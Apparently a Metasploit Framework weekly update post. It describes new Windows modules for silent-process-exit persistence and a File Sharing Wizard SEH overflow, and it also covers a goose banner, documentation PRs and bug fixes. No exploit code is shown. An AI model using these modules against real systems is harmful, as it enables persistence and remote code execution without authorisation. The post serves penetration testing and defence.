Last updated at Wed, 17 Jan 2024 01:53:12 GMT

Exploiting Windows tools

There are two new Windows modules this week, both brought to you by the Metasploit team.

The Windows Silent Process Exit Persistence module, from our own bwatters-r7, exploits a Windows tool that allows for debugging a specified process on exit. With escalated privileges, an attacker can configure the debug process and then use the module to upload a payload which will launch every time the specified binary exits.

The File Sharing Wizard - POST SEH Overflow module, contributed by our own dwelch-r7, exploits a vulnerability in the Windows File Sharing Wizard. An unauthenticated HTTP POST Structured Exception Handler (SEH) buffer overflow allows a remote attacker to obtain arbitrary code execution on vulnerable Windows targets.

Untitled Goose Banner

A contribution by 0xGilda addresses a glaring omission from msfconsole, which is its lack of Untitled Goose Game homages. A new goose banner has been added, which you can now see on startup. HONK!

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'

       =[ metasploit v5.0.54-dev-82c77a4ec8               ]
+ -- --=[ 1931 exploits - 1079 auxiliary - 332 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 >

New modules (2)

Enhancements and features

  • PR #12398 by nsa adds documentation for the auxiliary/scanner/ssh/ssh_version module.
  • PR #12368 by h00die adds documentation for the auxiliary/server/capture/smb module.
  • PR #12396 by bwatters-r7 updates metasploit-payloads to version 1.3.78, which adds support for key event management in Java payloads.
  • PR #12388 by zeroSteiner adds metadata to the SMB client library, which enables detection of required signatures for incoming connections to the target host.

Bugs fixed

  • PR #12432 by busterb fixes a false negative bug in the BlueKeep scanner by checking the length of the result from an rdp_recv call in the RDP library.
  • PR #12404 by bcoles fixes a bug with the shell session handler that resulted in unexpected deletion of directories when the path contained a space.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

We recently announced the release of Metasploit 5. You can get it by cloning
the Metasploit Framework repo (master branch). To install fresh without using git,
you can use the open-source-only Nightly Installers or the binary installers
(which also include the commercial editions).